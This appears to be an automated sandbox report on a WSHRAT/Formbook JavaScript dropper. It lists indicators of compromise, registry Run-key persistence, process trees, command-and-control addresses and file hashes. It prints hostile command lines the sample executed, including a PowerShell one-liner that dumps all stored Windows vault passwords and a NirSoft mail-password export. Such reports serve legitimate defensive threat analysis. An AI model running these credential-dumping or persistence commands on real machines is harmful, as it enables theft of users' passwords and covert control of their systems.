Malware Analysis Report

2024-10-19 09:24

Sample ID 230808-mwcnradf21
Target Scan00516.js
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
Tags
formbook wshrat me15 persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9

Threat Level: Known bad

The file Scan00516.js was found to be: Known bad.

Malicious Activity Summary

formbook wshrat me15 persistence rat spyware stealer trojan

WSHRAT

Formbook

NirSoft MailPassView

Formbook payload

Nirsoft

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 10:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 10:48

Reported

2023-08-08 10:51

Platform

win7-20230712-en

Max time kernel

45s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3408354897-1169622894-3874090110-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3408354897-1169622894-3874090110-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2144 set thread context of 1232 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 2144 set thread context of 1232 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 2960 set thread context of 1232 N/A C:\Windows\SysWOW64\help.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\help.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1808 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1808 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 2896 wrote to memory of 2144 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 2896 wrote to memory of 2144 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 2896 wrote to memory of 2144 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 2896 wrote to memory of 2144 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 1232 wrote to memory of 2960 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1232 wrote to memory of 2960 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1232 wrote to memory of 2960 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 1232 wrote to memory of 2960 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 2960 wrote to memory of 768 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 768 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 768 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 768 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan00516.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan00516.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\autoconv.exe

"C:\Windows\SysWOW64\autoconv.exe"

C:\Windows\SysWOW64\help.exe

"C:\Windows\SysWOW64\help.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 185.38.151.11:80 astatech-cn.com tcp
GB 185.38.151.11:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 8.8.8.8:53 www.thegrill253.com udp
US 34.149.87.45:80 www.thegrill253.com tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 www.wheatgrass.expert udp
US 34.102.136.180:80 www.wheatgrass.expert tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 www.barbariluxbar.com udp
IR 31.7.73.177:80 www.barbariluxbar.com tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 www.360elitemotions.com udp
US 34.117.168.233:80 www.360elitemotions.com tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 www.xiaoao.asia udp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 45.90.222.131:7121 45.90.222.131 tcp
US 8.8.8.8:53 www.jbqqb0.boats udp
US 45.90.222.131:7121 45.90.222.131 tcp

Files

C:\Users\Admin\AppData\Roaming\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

memory/2144-68-0x0000000000810000-0x0000000000B13000-memory.dmp

memory/1232-70-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/2144-69-0x0000000000200000-0x0000000000215000-memory.dmp

memory/1232-72-0x0000000006C40000-0x0000000006DC0000-memory.dmp

memory/2144-71-0x0000000001180000-0x00000000011AF000-memory.dmp

memory/2144-74-0x0000000001180000-0x00000000011AF000-memory.dmp

memory/2144-75-0x0000000000280000-0x0000000000295000-memory.dmp

memory/1232-76-0x00000000068D0000-0x00000000069DE000-memory.dmp

memory/1232-79-0x0000000006C40000-0x0000000006DC0000-memory.dmp

memory/2960-78-0x0000000000B70000-0x0000000000B76000-memory.dmp

memory/2960-80-0x0000000000B70000-0x0000000000B76000-memory.dmp

memory/2960-81-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/2960-82-0x0000000000780000-0x0000000000A83000-memory.dmp

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

memory/2960-84-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/1232-85-0x00000000068D0000-0x00000000069DE000-memory.dmp

memory/2960-87-0x0000000000690000-0x0000000000724000-memory.dmp

memory/1232-88-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/1232-89-0x00000000094C0000-0x0000000009615000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk.zip

MD5 d9a63dfd8b73629421bb44bcde09f312
SHA1 7855575c12eaee0e734f3901ca1da2931e9b587a
SHA256 9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb
SHA512 df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8

memory/1232-2680-0x00000000094C0000-0x0000000009615000-memory.dmp

memory/1232-9639-0x00000000094C0000-0x0000000009615000-memory.dmp

memory/2896-10567-0x000007FEFBD20000-0x000007FEFBD28000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk\Lib\SITE-P~1\adodbapi\test\is64bit.py

MD5 ca2cc8e73bbca371935bbc92ed18d567
SHA1 1adb458919e842cd78c72b1ff00e5e93cb6ef75e
SHA256 bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1
SHA512 b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223

memory/2260-23913-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23914-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2260-23912-0x000000001B330000-0x000000001B612000-memory.dmp

memory/2260-23911-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

memory/2260-23915-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23916-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23917-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

memory/2260-23918-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23920-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Roaming\wshsdk\VCRUNTIME140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll

MD5 41a348f9bedc8681fb30fa78e45edb24
SHA1 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256 c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA512 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204

C:\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.DLL

MD5 d6326267ae77655f312d2287903db4d3
SHA1 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SHA512 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll

MD5 8d02dd4c29bd490e672d271700511371
SHA1 f3035a756e2e963764912c6b432e74615ae07011
SHA256 c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SHA512 d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0

